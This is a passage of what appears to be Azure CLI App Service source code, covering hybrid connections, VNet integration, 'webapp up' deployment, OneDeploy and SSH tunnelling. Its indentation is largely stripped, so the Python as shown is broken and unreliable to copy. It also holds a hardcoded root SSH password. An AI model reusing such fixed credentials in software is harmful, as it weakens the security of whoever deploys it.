hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
    # ensures the input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
    # reformat the vnet entries, removing unnecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_webapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check, True)
def add_functionapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None,
skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check, False)
def _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False,
is_webapp=True):
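    ''' Validate the subnet location (and, unless skipped, its delegation to Microsoft.Web/serverFarms),
    then patch the site with the subnet resource ID and enable the Route All configuration. '''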
from azure.mgmt.web.models import SitePatchResource
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
client = web_client_factory(cmd.cli_ctx)
if is_webapp:
app = show_webapp(cmd, resource_group_name, name, slot)
else:
app = show_functionapp(cmd, resource_group_name, name, slot)
parsed_plan = parse_resource_id(app.app_service_plan_id)
plan_info = client.app_service_plans.get(parsed_plan['resource_group'], parsed_plan["name"])
_validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"])
if skip_delegation_check:
logger.warning('Skipping delegation check. Ensure that subnet is delegated to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
else:
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
subnet_id = subnet_info["subnet_resource_id"]
if not slot:
client.web_apps.update(resource_group_name=resource_group_name,
name=name,
site_envelope=SitePatchResource(virtual_network_subnet_id=subnet_id))
else:
client.web_apps.update_slot(resource_group_name=resource_group_name,
name=name,
slot=slot,
site_envelope=SitePatchResource(virtual_network_subnet_id=subnet_id))
# Enable Route All configuration
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.vnet_route_all_enabled is not True:
config = update_site_configs(cmd, resource_group_name, name, slot=slot, vnet_route_all_enabled='true')
return {
"id": subnet_info["vnet_resource_id"],
"location": plan_info.location, # must be the same as vnet location bc of validation check
"name": subnet_info["vnet_name"],
"resourceGroup": subnet_info["resource_group_name"],
"subnetResourceId": subnet_info["subnet_resource_id"]
}
def _vnet_delegation_check(cmd, subnet_subscription_id, vnet_resource_group, vnet_name, subnet_name):
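    ''' Ensure the subnet is delegated to Microsoft.Web/serverFarms. The delegation is added only when the
    subnet is in the current subscription; otherwise a warning with the manual command is emitted. '''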
from azure.cli.core.commands.client_factory import get_subscription_id
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
vnet_client = network_client_factory(cmd.cli_ctx)
if get_subscription_id(cmd.cli_ctx).lower() != subnet_subscription_id.lower():
logger.warning('Cannot validate subnet in other subscription for delegation to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
logger.warning('To manually add a delegation, use the command: az network vnet subnet update '
'--resource-group %s '
'--name %s '
'--vnet-name %s '
'--delegations Microsoft.Web/serverFarms', vnet_resource_group, subnet_name, vnet_name)
else:
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
subnet_parameters=subnetObj)
def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
subnet_is_id = is_valid_resource_id(subnet)
if subnet_is_id:
subnet_id_parts = parse_resource_id(subnet)
vnet_name = subnet_id_parts['name']
if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)):
logger.warning('Subnet ID is valid. Ignoring vNet input.')
return subnet
vnet_is_id = is_valid_resource_id(vnet)
if vnet_is_id:
vnet_id_parts = parse_resource_id(vnet)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
# Reuse logic from existing command to stay backwards compatible
vnet_client = network_client_factory(cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
vnet_id_parts = parse_resource_id(vnet_id)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False,
app_service_environment=None):
if not name:
name = generate_default_app_name(cmd)
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == 'linux'
if runtime and html:
raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime)
if not match:
if _is_linux:
raise CLIError("Linux runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
raise CLIError("Windows runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription if updating an existing app. If creating "
"a new app, app names must be globally unique. Please try a more unique name or "
"leave unspecified to receive a randomly generated name.".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'. "
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation. For more information on default behaviors, "
"see https://docs.microsoft.com/cli/azure/webapp?view=azure-cli-latest#az_webapp_up."
.format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(user, resource_group_name)
_create_new_rg = not check_resource_group_exists(cmd, rg_name)
plan = get_plan_to_use(cmd=cmd,
user=user,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration, re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we always call the ASP create-or-update API so that, in case of re-deployment, any updated SKU or
# plan settings are applied as well
try:
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc,
app_service_environment=app_service_environment)
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code == 409: # catch 409 conflict when trying to create existing ASP in diff location
try:
response_content = json.loads(ex.response._content.decode('utf-8')) # pylint: disable=protected-access
except Exception: # pylint: disable=broad-except
raise CLIInternalError(ex)
raise UnclassifiedUserFault(response_content['error']['message'])
raise AzureResponseError(ex)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
match = helper.resolve(runtime_version)
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
if match and site_config.linux_fx_version != match['configs']['linux_fx_version']:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, match['configs']['linux_fx_version'])
update_site_configs(cmd, rg_name, name, linux_fx_version=match['configs']['linux_fx_version'])
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif not match:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif os_name.lower() == 'windows':
# may need to update stack runtime settings. For node it's site_config.app_settings; otherwise site_config
if match:
_update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
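# Illustrative usage (editorial addition; all values below are placeholders): webapp_up backs `az webapp up`,
# so a typical invocation from a project directory looks like
#   az webapp up --name <app-name> --resource-group <rg> --runtime "PYTHON|3.8" --sku B1 --location westus2
# With --dryrun the command stops after returning the JSON summary built above instead of deploying.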
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
update_needed = False
if 'node' in runtime_version:
settings = []
for k, v in match['configs'].items():
for app_setting in site_config.app_settings:
if app_setting.name == k and app_setting.value != v:
update_needed = True
settings.append('%s=%s' % (k, v))
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
else:
for k, v in match['configs'].items():
if getattr(site_config, k, None) != v:
update_needed = True
setattr(site_config, k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_site_configs(cmd,
rg_name,
name,
net_framework_version=site_config.net_framework_version,
php_version=site_config.php_version,
python_version=site_config.python_version,
java_version=site_config.java_version,
java_container=site_config.java_container,
java_container_version=site_config.java_container_version)
current_stack = get_current_stack_from_runtime(runtime_version)
_update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
if update_needed:
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
# portal uses this current_stack value to display correct runtime for windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, metadata=app_metadata)
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def perform_onedeploy(cmd,
resource_group_name,
name,
src_path=None,
src_url=None,
target_path=None,
artifact_type=None,
is_async=None,
restart=None,
clean=None,
ignore_stack=None,
timeout=None,
slot=None):
params = OneDeployParams()
params.cmd = cmd
params.resource_group_name = resource_group_name
params.webapp_name = name
params.src_path = src_path
params.src_url = src_url
params.target_path = target_path
params.artifact_type = artifact_type
params.is_async_deployment = is_async
params.should_restart = restart
params.is_clean_deployment = clean
params.should_ignore_stack = ignore_stack
params.timeout = timeout
params.slot = slot
return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
def __init__(self):
self.cmd = None
self.resource_group_name = None
self.webapp_name = None
self.src_path = None
self.src_url = None
self.artifact_type = None
self.is_async_deployment = None
self.target_path = None
self.should_restart = None
self.is_clean_deployment = None
self.should_ignore_stack = None
self.timeout = None
self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _build_onedeploy_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
deploy_url = scm_url + '/api/publish?type=' + params.artifact_type
if params.is_async_deployment is not None:
deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)
if params.should_restart is not None:
deploy_url = deploy_url + '&restart=' + str(params.should_restart)
if params.is_clean_deployment is not None:
deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)
if params.should_ignore_stack is not None:
deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)
if params.target_path is not None:
deploy_url = deploy_url + '&path=' + params.target_path
return deploy_url
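# Example (hypothetical app name, editorial addition): for a zip artifact deployed asynchronously with a
# restart, the URL built above would look like
#   https://<app>.scm.azurewebsites.net/api/publish?type=zip&async=True&restart=True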
def _get_onedeploy_status_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
return scm_url + '/api/deployments/latest'
def _get_basic_headers(params):
import urllib3
user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
params.webapp_name, params.slot)
if params.src_path:
content_type = 'application/octet-stream'
elif params.src_url:
content_type = 'application/json'
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['Content-Type'] = content_type
return headers
def _get_onedeploy_request_body(params):
import os
if params.src_path:
logger.info('Deploying from local path: %s', params.src_path)
try:
with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
body = fs.read()
except Exception as e: # pylint: disable=broad-except
raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it"
.format(params.src_path)) from e
elif params.src_url:
logger.info('Deploying from URL: %s', params.src_url)
body = json.dumps({
"packageUri": params.src_url
})
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
return body
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
file_extension = file_name.split(".", 1)[1]
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deployment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
import requests
from azure.cli.core.util import (
should_disable_connection_verify,
)
# Build the request body, headers, API URL and status URL
body = _get_onedeploy_request_body(params)
headers = _get_basic_headers(params)
deploy_url = _build_onedeploy_url(params)
deployment_status_url = _get_onedeploy_status_url(params)
logger.info("Deployment API: %s", deploy_url)
response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
# For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
# For that, set poll_async_deployment_for_debugging=True
poll_async_deployment_for_debugging = True
# check the status of async deployment
if response.status_code == 202 or response.status_code == 200:
response_body = None
if poll_async_deployment_for_debugging:
logger.info('Polling the status of async deployment')
response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
deployment_status_url, headers, params.timeout)
logger.info('Async deployment complete. Server response: %s', response_body)
return response_body
# API not available yet!
if response.status_code == 404:
raise CLIError("This API isn't available in this environment yet!")
# check if there's an ongoing process
if response.status_code == 409:
raise CLIError("Another deployment is in progress. Please wait until that process is complete before "
"starting a new deployment. You can track the ongoing deployment at {}"
.format(deployment_status_url))
# check if an error occurred during deployment
if response.status_code:
raise CLIError("An error occurred during deployment. Status Code: {}, Details: {}"
.format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
# Update artifact type, if required
_update_artifact_type(params)
# Now make the OneDeploy API call
logger.info("Initiating deployment")
response = _make_onedeploy_request(params)
logger.info("Deployment has completed successfully")
return response
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
try:
c.run('cat /etc/motd', pty=True)
except invoke.exceptions.UnexpectedExit:
# Don't crash over a non-existing /etc/motd.
pass
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
if not instance:
open_page_in_browser(scm_url + '/webssh/host')
else:
open_page_in_browser(scm_url + '/webssh/host?instance={}'.format(instance))
else:
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise ValidationError('Remote debugging is enabled, please disable')
create_tunnel_and_session(
cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or
hostname_binding.host_name_type == 'Managed'):
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot, key=key_info)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name, key=key_info)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot)
